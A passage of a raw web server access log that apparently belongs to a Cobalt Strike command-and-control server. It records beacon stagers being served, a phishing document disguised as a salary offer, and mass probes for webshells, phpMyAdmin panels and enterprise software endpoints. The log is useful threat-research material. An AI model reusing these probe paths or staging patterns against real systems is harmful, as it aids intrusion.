Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:31 UTC] "POST /jsc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:32 UTC] "POST /jsc.php.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:32 UTC] "POST /jsc.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:33 UTC] "POST /11a.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:33 UTC] "POST /kkl.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:34 UTC] "POST /ks1.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:35 UTC] "POST /wsx.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:36 UTC] "POST /lz.php/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:56 UTC] "POST /zmp.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:59 UTC] "POST /zzz.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:24:59 UTC] "POST /ze.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:01 UTC] "POST /nnb.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:03 UTC] "POST /mm.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:05 UTC] "POST /mmp.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:06 UTC] "POST /hades.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:08 UTC] "POST /muma.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:09 UTC] "POST /shell.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:12 UTC] "POST /ag.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:13 UTC] "POST /2ndex.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:25:14 UTC] "POST /my.php/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:26:03 UTC] "POST /qq.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:26:03 UTC] "POST /config.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:26:04 UTC] "POST /1.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:26:04 UTC] "POST /1.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:26:05 UTC] "POST /miao.php" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:26:06 UTC] "GET /seeyon/htmlofficeservlet" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:26:07 UTC] "GET /secure/ContactAdministrators!default.jspa" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:26:07 UTC] "GET /weaver/bsh.servlet.BshServlet" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" +132.232.201.218 unknown unknown [03/30 05:26:11 UTC] "POST /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" +132.232.201.218 unknown unknown [03/30 05:26:11 UTC] "POST /user/register" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0" +132.232.201.218 unknown unknown [03/30 05:26:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0" +132.232.201.218 unknown unknown [03/30 05:26:12 UTC] "POST /user.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0" +132.232.201.218 unknown unknown [03/30 05:26:13 UTC] "GET /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:16 UTC] "GET /phpmyadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:16 UTC] "GET /phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:17 UTC] "GET /pmd/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:17 UTC] "GET /pma/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:18 UTC] "GET /PMA/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:19 UTC] "GET /PMA2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:19 UTC] "GET /pmamy/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:20 UTC] "GET /pmamy2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:20 UTC] "GET /mysql/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:21 UTC] "GET /admin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:23 UTC] "GET /db/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:23 UTC] "GET /dbadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:24 UTC] "GET /web/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:25 UTC] "GET /admin/pma/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:26 UTC] "GET /admin/PMA/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:26 UTC] "GET /admin/mysql/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:27 UTC] "GET /admin/mysql2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:30 UTC] "GET /admin/phpmyadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:31 UTC] "GET /admin/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:31 UTC] "GET /admin/phpmyadmin2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:32 UTC] "GET /mysqladmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:34 UTC] "GET /mysql-admin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:35 UTC] "GET /mysql_admin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:36 UTC] "GET /phpadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:38 UTC] "GET /phpmyadmin0/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:40 UTC] "GET /phpmyadmin1/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:41 UTC] "GET /phpmyadmin2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:43 UTC] "GET /phpMyAdmin4.8.0/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:45 UTC] "GET /phpMyAdmin4.8.1/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:46 UTC] "GET /phpMyAdmin4.8.2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:47 UTC] "GET /phpMyAdmin4.8.4/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:48 UTC] "GET /phpMyAdmin4.8.5/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:50 UTC] "GET /myadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:51 UTC] "GET /myadmin2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:51 UTC] "GET /xampp/phpmyadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:52 UTC] "GET /phpMyadmin_bak/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:53 UTC] "GET /www/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:54 UTC] "GET /tools/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:54 UTC] "GET /phpMyAdminold/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:56 UTC] "GET /phpMyAdmin.old/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:57 UTC] "GET /pma-old/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:57 UTC] "GET /claroline/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:26:58 UTC] "GET /typo3/phpmyadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:03 UTC] "GET /phpma/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:03 UTC] "GET /phpmyadmin/phpmyadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:06 UTC] "GET /phpMyAdmin/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:07 UTC] "GET /phpMyAbmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:11 UTC] "GET /phpMyAdmin__/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:11 UTC] "GET /phpMyAdmin ---/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:12 UTC] "GET /v/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:14 UTC] "GET /phpMyAdm1n/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:16 UTC] "GET /shaAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:18 UTC] "GET /phpMyadmi/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:19 UTC] "GET /phpMyAdmion/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:19 UTC] "GET /s/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:20 UTC] "GET /MyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:22 UTC] "GET /phpMyAdmin123/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:23 UTC] "GET /pwd/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:23 UTC] "GET /phpMyAdmina/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:24 UTC] "GET /phpMydmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:26 UTC] "GET /phpMyAdmins/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:26 UTC] "GET /phpMyAdmin._/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:28 UTC] "GET /phpMyAdmin._2/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:29 UTC] "GET /phpmyadmin2222/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:29 UTC] "GET /phpMyAdmin333/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:30 UTC] "GET /phpmyadmin3333/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:34 UTC] "GET /php2MyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:35 UTC] "GET /phpiMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:35 UTC] "GET /phpNyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:36 UTC] "GET /1/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:38 UTC] "GET /download/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:39 UTC] "GET /phpMyAdmin_111/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:42 UTC] "GET /phpmadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:43 UTC] "GET /321/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:43 UTC] "GET /123131/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:44 UTC] "GET /phpMyAdminn/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:44 UTC] "GET /phpMyAdminhf/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:46 UTC] "GET /WWW/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:47 UTC] "GET /phpMyAdmln/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:48 UTC] "GET /phpMyAdmin_ai/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:48 UTC] "GET /__phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:50 UTC] "GET /program/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:50 UTC] "GET /phppma/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:51 UTC] "GET /phpmy/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:52 UTC] "GET /mysql/admin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:53 UTC] "GET /mysql/dbadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:53 UTC] "GET /mysql/sqlmanager/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:56 UTC] "GET /mysql/mysqlmanager/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:58 UTC] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:59 UTC] "GET /sqladmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:59 UTC] "GET /sql/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:00 UTC] "GET /SQL/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:00 UTC] "GET /websql/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:02 UTC] "GET /MySQLAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:02 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +195.154.211.33 unknown unknown [03/30 05:31:56 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +171.67.70.85 unknown unknown [03/30 07:18:50 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +13.81.175.116 unknown unknown [03/30 07:55:15 UTC] "GET /download/doc56893" 200 150016 "page Serves /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +13.81.175.116 unknown unknown [03/30 07:55:39 UTC] "GET /zcF9/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" +103.84.4.83 unknown unknown [03/30 08:47:07 UTC] "GET /shell" 404 0 "" "Hello, world" +36.75.156.198 unknown unknown [03/30 08:49:33 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +46.101.171.183 unknown unknown [03/30 08:58:14 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +185.67.188.141 unknown unknown [03/30 09:37:33 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +196.195.46.244 unknown unknown [03/30 09:38:13 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +81.183.137.35 unknown unknown [03/30 09:44:23 UTC] "GET /" 404 0 "" "null" +45.170.220.85 unknown unknown [03/30 10:26:37 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +81.183.137.35 unknown unknown [03/30 10:26:57 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8" +103.83.5.41 unknown unknown [03/30 10:28:54 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +81.183.137.35 unknown unknown [03/30 10:38:02 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8" +81.183.137.35 unknown unknown [03/30 11:07:02 UTC] "GET /" 404 0 "" "Xenu Link Sleuth/1.3.8" +81.183.137.35 unknown unknown [03/30 11:07:03 UTC] "GET /" 404 0 "" "Xenu Link Sleuth/1.3.8" +171.67.70.85 unknown unknown [03/30 13:15:16 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +109.96.63.210 unknown unknown [03/30 14:20:22 UTC] "GET /" 404 0 "" "null" +189.252.15.136 unknown unknown [03/30 14:46:27 UTC] "GET /" 404 0 "" "null" +27.106.17.194 unknown unknown [03/30 15:31:05 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +68.183.195.23 unknown unknown [03/30 15:41:39 UTC] "GET /index.php" 404 0 "" "null" +81.183.137.35 unknown unknown [03/30 16:17:31 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8" +81.183.137.35 unknown unknown [03/30 16:32:42 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8" +192.241.238.53 unknown unknown [03/30 18:44:23 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 zgrab/0.x" +162.243.128.129 unknown unknown [03/30 18:47:33 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 zgrab/0.x" +171.67.70.85 unknown unknown [03/30 19:15:52 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +192.241.195.168 unknown unknown [03/30 21:15:52 UTC] "GET /hudson" 404 0 "" "Mozilla/5.0 zgrab/0.x" +128.14.209.226 unknown unknown [03/30 21:24:11 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" +185.153.197.10 unknown unknown [03/30 21:35:26 UTC] "/*�Cookie: mstshash=Administr" 404 0 "" "null" +185.153.197.10 unknown unknown [03/30 21:43:03 UTC] "/*�Cookie: mstshash=Administr" 404 0 "" "null" +195.205.161.11 